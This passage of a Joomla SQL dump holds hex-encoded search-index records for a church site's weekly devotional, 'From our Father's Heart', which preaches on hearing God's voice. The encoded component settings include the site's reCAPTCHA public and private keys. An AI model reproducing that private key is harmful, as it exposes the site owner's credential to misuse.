3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30322d30352032313a33393a3238223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2237223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2232313a66726f6d2d6f75722d6661746865722d732d68656172742d30352d30322d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f32312d66726f6d2d6f75722d6661746865722d732d68656172742d30352d30322d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3231223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32313a66726f6d2d6f75722d6661746865722d732d68656172742d30352d30322d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202830352f30322f3230313729223b733a31313a226465736372697074696f6e223b733a3435303a2220446561726c792062656c6f7665642c20596f75206d757374206b6e6f7720686f7720746f207375737461696e207468652070726573656e6365206f6620746865204c6f726420696e20796f7572206c6966652e20596f75206d6179206e6f74206b6e6f77206d616e79207468696e67732062757420696620796f75206b656570207468652070726573656e6365206f6620476f642048652077696c6c2067657420796f75207468726f7567682e2054686174207761732074686520736563726574206f662044617669642e20497420776173206e6f742044617669642074686174206b696c6c656420476f6c696174682c20697420776173207468652070726573656e6365206f6620476f642074686174206b696c6c656420476f6c696174682e20486f772063616e20612073746f6e65207468726f776e206279206120626f79206b696c6c2061206769616e74206c696b6520746861743f2044617669642068696d73656c66207361696420746865204c6f726420746861742064656c697665726564206d652066726f6d207468652068616e64206f662074686520626561722077696c6c2064656c6976657220796f7520696e746f206d792068616e642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d30352032313a33303a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d30352032313a33303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(258, 'index.php?option=com_k2&view=item&id=26', 'index.php?option=com_k2&view=item&id=26:from-our-father-s-heart-19-02-2017', 'From our Father\'s Heart (19/02/2017)', ' Dearly Beloved, John 10: 4-5 says “ And when he putteth forth his own sheep, he goeth before them, and the sheep follow him: for they know his voice. And a stranger will they not follow, but will flee from him: for they know not the voice of strangers. Your security and safety in 2017 will be dependent on how much of God’s voice you can recognize and obey. ', '2017-06-25 14:19:34', 'c16d149306c6d71a2d471c3e050befef', 1, 1, 1, '*', '2017-02-19 19:09:27', '0000-00-00 00:00:00', '2017-02-19 19:09:27', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223236223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d31392d30322d32303137223b733a373a2273756d6d617279223b733a3431353a223c703e3c656d3e3c7374726f6e673e446561726c792042656c6f7665642c3c2f7374726f6e673e3c2f656d3e3c2f703e0d0a3c703e4a6f686e2031303a20342d35207361797320e2809c20416e64207768656e206865207075747465746820666f72746820686973206f776e2073686565702c20686520676f657468206265666f7265207468656d2c20616e642074686520736865657020666f6c6c6f772068696d3a20666f722074686579206b6e6f772068697320766f6963652e20416e6420c2a06120737472616e6765722077696c6c2074686579206e6f7420666f6c6c6f772c206275742077696c6c20666c65652066726f6d2068696d3a20666f722074686579206b6e6f77206e6f742074686520766f696365206f6620737472616e676572732e3c2f703e0d0a3c703e596f757220736563757269747920616e642073616665747920696e20323031372077696c6c20626520646570656e64656e74206f6e20686f77206d756368206f6620476f64e280997320766f69636520796f752063616e207265636f676e697a6520616e64206f6265792e3c2f703e0d0a223b733a343a22626f6479223b733a323539323a220d0a3c703e54686520766f696365206f6620476f6420636f6d657320746f2061206d616e207769746820706f7765722e20497420697320476f64e280997320766f696365207468617420636f6d657320746f20757320616e64206f70656e73206e657720706f73736962696c6974696573206f66206c69666520746f2075732e2054686520736166657479206f6620657665727920736865657020697320696e20746865206162696c697479206f66207468617420736865657020746f207265636f676e697a6520746865207368657068657264e280997320766f6963652e205468652070726f6f66206f6620796f757220736f6e2d7368697020697320696e20796f7572206162696c69747920746f206865617220476f64e280997320766f6963652e20546865726520617265206d616e7920766f6963657320696e2074686520776f726c642c20627574206974206973206f6e6c79206f6e6520766f696365207468617420476f642077616e747320796f7520746f206d617374657220616e6420726573706f6e6420746f20616c776179732c20616e6420746861742069732074686520766f696365206f6620746865204c6f72642e3c2f703e0d0a3c703ec2a05768656e657665722074686520766f696365206f6620746865204c6f726420636f6d657320746f2061206d616e2c20686973206c696665207069636b732075702e20492053616d20333a34207361797320e2809c746865204c6f72642063616c6c65642053616d75656c3a20616e6420686520616e7377657265642c204865726520616d2049e2809d2e2046726f6d207468617420706f696e74206f6e2c20746865206a6f75726e6579206f662053616d75656c206f6e6c792077656e742075707761726420616e6420666f72776172642e204973616961682068656172642074686520766f696365206f6620746865204c6f726420696e2049736169616820363a3820736179696e6720e2809c416c736f20492068656172642074686520766f696365206f6620746865204c6f72642c20736179696e672c2077686f6d207368616c6c20492073656e642c20616e642077686f2077696c6c20676f20666f722075733f205468656e207361696420492c204865726520616d20493b2073656e64206d65e2809d2e2054686520766f696365206f6620746865204c6f72642069732077686174206d616b657320616c6c2074686520646966666572656e63652e3c2f703e0d0a3c703e492077616e7420796f7520696e203230313720746f20646576656c6f70206d6f7265207468616e206e65766572206265666f726520796f7572206162696c69747920746f20686561722074686520766f696365206f6620746865204c6f72642e205768656e20796f75207365652070656f706c65207374727567676c6520696e206c6966652c2069742069732062656361757365207468657920617265206e6f742068656172696e6720636f72726563746c79206f722074686579206172652068656172696e672077726f6e6720766f6963652e204973616961682033303a3231207361797320e2809c20416e64207468696e652065617273207368616c6c2068656172206120776f726420626568696e6420746865652c20736179696e672c205468697320697320746865207761792c2077616c6b20796520696e2069742c207768656e207965207475726e20746f207468652072696768742068616e642c20616e64207768656e207965207475726e20746f20746865206c6566742ee2809d20476f6420697320616c7761797320696e20746865206861626974206f6620737065616b696e6720746f20486973206368696c6472656e2c20627574206d656e2061726520616c736f20616c7761797320696e20746865206861626974206f66206e6f74206c697374656e696e6720746f2048697320766f6963652e3c2f703e0d0a3c703e5768656e2061206d616e206d6173746572732068656172696e672074686520766f696365206f6620746865204c6f72642c2068652077696c6c20626520617420616e20616476616e7461676520696e206c6966652e20476f6420746f6c64206d65207768656e20492073746172746564206d696e69737472792c2074776f207375626a6563747320746861742049206d757374206d617374657220736f2077656c6c3a20484f5720544f204245204c45442042592054484520484f4c592053504952495420616e6420484f5720544f204c4956452042592046414954482e2054686973206973206d7920333474682079656172206f66206f626579696e6720476f64e28099732063616c6c2c2065766572792074696d65204920736565206d656e207374727567676c6520696e206c69666520616e642067657420737472616e6465642c2074686579206d69737365642074686520766f696365206f6620476f6420736f6d6577686572652e205468617420686173206e65766572206661696c6564206265666f72652e3c2f703e0d0a3c703e596f7572206e657874206c6576656c206973206469726563746c79206c696e6b656420746f20796f7572206162696c69747920746f20686561722074686520766f696365206f6620746865204c6f72642e20416e792074696d65207765206c6f73652074686520766f696365206f6620476f642c207765206c6f736520646972656374696f6e20616e642070617274696369706174696f6e206f6620746865204c6f72642e2049742069732074686520766f696365206f6620746865204c6f72642074686174206272696e6773206e6577206d65726369657320696e746f206f7572206c697665732e2049742069732074686520766f696365206f6620746865204c6f72642074686174206769766573207573206f7572206461696c7920616c6c6f636174696f6e732e2049742069732074686520766f696365206f6620746865204c6f726420746861742074616b657320757320746f206e6577206865696768747320616e64206e6577207265616c6d7320696e20476f642e3c2f703e0d0a3c703e49742069732074686520766f696365206f6620746865204c6f726420746861742067756172616e74656573206f7572207361666574792c2073656375726974792c2070726f677265737320616e64207375636365737320696e206c6966652e204c657420796f75722064657369726520616e64206f757463727920626520696e203230313720746f206c6561726e206d6f726520746f206c697374656e20746f2074686520766f696365206f6620746865204c6f72642c20616e6420746861742077696c6c2067756172616e747920796f75722070657270657475616c20766963746f727920617320796f7520676f20696e2074686520646179732061686561642ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732053657276616e743c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e2e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30322d32362031373a34393a3235223b733a31313a226d6f646966696564